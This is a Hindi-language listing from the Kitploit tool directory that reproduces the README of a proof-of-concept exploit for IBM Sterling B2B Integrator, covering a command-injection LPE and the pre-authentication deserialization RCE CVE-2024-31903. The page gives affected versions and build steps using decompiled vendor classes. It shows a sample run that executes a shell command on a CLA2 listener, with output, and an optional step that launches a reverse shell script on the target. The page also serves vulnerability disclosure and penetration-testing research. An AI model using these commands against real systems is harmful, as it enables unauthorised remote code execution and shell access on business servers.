Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ibm-sterling-b2b-integrator-poc — IBM Sterling B2B Integrator के विरुद्ध LPE और RCE (CVE-2024-31903) हमलों के लिए PoC कोड | Kitploit
उपकरण/GitHubGitHub/reverseclabs/ibm-sterling-b2b-integrator-poc
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंटबाइनरी शोषण
GitHubreverseclabs/ibm-sterling-b2b-integrator-poc

ibm-sterling-b2b-integrator-poc

IBM Sterling B2B Integrator के विरुद्ध LPE और RCE (CVE-2024-31903) हमलों के लिए PoC कोड

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

IBM Sterling B2B Integrator PoC

IBM Sterling B2B Integrator, संस्करण 6.2.0.0 से 6.2.0.2, और 6.0.0.0 से 6.1.2.5 (Linux, Windows और AIX सिस्टम के लिए) में पाई गई कमजोरियों के शोषण के लिए प्रूफ ऑफ कॉन्सेप्ट कोड:

  • LPE कमांड इंजेक्शन - यदि प्रमाणीकरण अक्षम है
  • प्री-ऑथ डिसीरियलाइजेशन RCE - CVE-2024-31903 असाइन किया गया, प्रासंगिक IBM सलाहकार नोटिस यहाँ देखें: https://www.ibm.com/support/pages/node/7172233

इन मुद्दों के बारे में अधिक जानकारी मेरी DistricCon वार्ता "To B or not 2B: Breaking the IBM B2B Integrator with, and without authentication" में पाई जा सकती है:

https://www.districtcon.org/bios-and-talks-2025/to-b-or-not-to-b

रेपो संरचना

इस रेपो में अधिकांश कोड LPE कमांड इंजेक्शन हमले को संदर्भित करता है।

Python बाइनरी क्लाइंट bin_client.py का उपयोग CLA2 को मैन्युअल रूप से संदेश भेजने के लिए किया जा सकता है, जिससे डिसीरियलाइजेशन RCE कमजोरी का शोषण संभव होता है।

उपयोग

root@kitploit:~
$ java Main
$ Usage: Main <cmdLine> <outfile_or_SEND> [host] [port]

PoC दो पैरामीटर स्वीकार करता है:

  • लक्ष्य CLA2 क्लाइंट द्वारा निष्पादित किया जाने वाला शेल कमांड
  • सीरियलाइज्ड जावा संदेश को डिस्क पर लिखने का पथ, ताकि बाद में bin_client.py जैसी किसी चीज़ से विश्लेषण/भेजा जा सके, या स्ट्रिंग "SEND" जो इसे तुरंत host:port पर भेजने के लिए जहाँ एक CLA2 क्लाइंट सुन रहा है

निर्देश

इस रेपो में शामिल स्रोत कोड जानबूझकर अधूरा है, क्योंकि CLA2 सबसिस्टम की कुछ कक्षाओं की आवश्यकता है। इंस्टॉलेशन निर्देशिका की फ़ाइल सिस्टम अनुमतियों के आधार पर, आप JAR फ़ाइलों तक पहुँच प्राप्त करने में सक्षम हो सकते हैं

यह मानते हुए कि आपने JAR डीकंपाइलेशन से प्रासंगिक फ़ाइलें प्राप्त कर ली हैं। यहाँ अपलोड नहीं किया जाएगा क्योंकि वे IBM IP का गठन करते हैं

  1. CLA2Client.jar डीकंपाइल करें

  2. डीकंपाइल किए गए कोड में, फ़ाइलें CmdLine2Result.java और CmdLine2Parms.java ढूंढें

  3. उन्हें Main.java के बगल में कॉपी और पेस्ट करें ताकि मूल एप्लिकेशन के जावा पैकेज की निर्देशिका संरचना को दोहराया जा सके

root@kitploit:~
/src/com/sterlingcommerce/woodstock/services/cmdline2/
  1. PoC प्रोग्राम संकलित करें - आदर्श रूप से एप्लिकेशन द्वारा पैकेज किए गए JDK का उपयोग करें
root@kitploit:~
${B2BHOME}/INSTALL/jdk/bin/javac src/com/sterlingcommerce/woodstock/services/cmdline2/*.java
  1. इसे निष्पादित करें - फिर से, यदि संभव हो तो एप्लिकेशन द्वारा पैकेज किए गए JDK का उपयोग करें
root@kitploit:~
${B2BHOME}/appl/SFG/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main '/bin/sh -c "id > /tmp/result"' SEND 127.0.0.1 5052
[+] Creating object...
[+] Sending object to 127.0.0.1:5052...
[+] ...Sent!
[+] Receiving header...
[+] ...header received: RESULT
[+] Receiving result...
[+] Result received:
##[DEBUG]## CmdLine2Result:
fileSize=0
outputNameLong=null
outputNameShort=null
******* end of CmdLine2Result *******
[+] clr.statusRpt:       null
[+] clr.exceptionString: null
[+] clr.somethingToLog:  CmdLine2Thread.runCommand: cmdLine before execution=/bin/sh -c "id > /tmp/result"
##[REMOTE DEBUG]## parm0=/bin/sh
##[REMOTE DEBUG]## parm1=-c
##[REMOTE DEBUG]## parm2=id > /tmp/result 
  1. (वैकल्पिक) पूरी तरह से इंटरैक्टिव शेल प्राप्त करने के लिए, revshell.py और revshell_listener.py स्क्रिप्ट को लक्ष्य सिस्टम पर अपलोड करें, और लिसनर शुरू करें। फिर, PoC के कमांड पैरामीटर को रिवर्स शेल स्क्रिप्ट के आह्वान से बदलें जैसा कि नीचे दिया गया है:
root@kitploit:~
${B2BHOME}/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main 'python3 /tmp/revshell.py 9090' SEND
टूल डाउनलोड करें